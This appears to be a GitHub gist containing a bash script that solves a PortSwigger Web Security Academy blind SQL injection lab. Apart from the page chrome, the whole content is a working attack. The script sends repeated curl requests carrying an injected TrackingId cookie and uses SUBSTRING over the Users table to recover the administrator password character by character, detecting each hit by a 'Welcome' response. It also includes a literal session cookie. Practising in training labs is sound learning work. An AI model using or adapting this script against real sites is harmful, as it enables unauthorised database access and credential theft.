Last active
June 15, 2021 20:37
-
-
Save svanellewee/4a776a42db7bd09dd094882013afc313 to your computer and use it in GitHub Desktop.
Blind SQL Injection!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# Copy the GET request, and insert the blind SQL in the TrackingId value... | |
# Then add a changing variable in the query | |
alpha=( {a..z} {A..Z} {0..9} \( \) % $ @ \& \# \* \& ^ \~ + _ / ) | |
results=() | |
for index in {1..100} | |
do | |
for ((chi=0;chi<$(( "${#alpha[@]}" - 2 ));chi++)) | |
do | |
a="${alpha[${chi}]}" | |
curl 'https://ac2e1f191ee6e67680981fd200c50090.web-security-academy.net/' \ | |
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0' \ | |
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \ | |
-H 'Accept-Language: en-US,en;q=0.5' \ | |
--compressed \ | |
-H 'Referer: https://portswigger.net/' \ | |
-H 'Connection: keep-alive' \ | |
-H "Cookie: TrackingId=xaaw' OR SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), ${index}, 1) = '${a}; session=VkyBAyZ5d5nGU1euvjZwkkh9Pv01gmS3" \ | |
-H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -s | grep Welcome -q | |
if [[ $? -eq 0 ]] | |
then | |
results=(${results[@]} ${a} ) | |
echo ">>>>>${results[*]}" | |
break | |
else | |
echo "nope" | |
fi | |
done | |
done | |
echo "${results[*]}" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment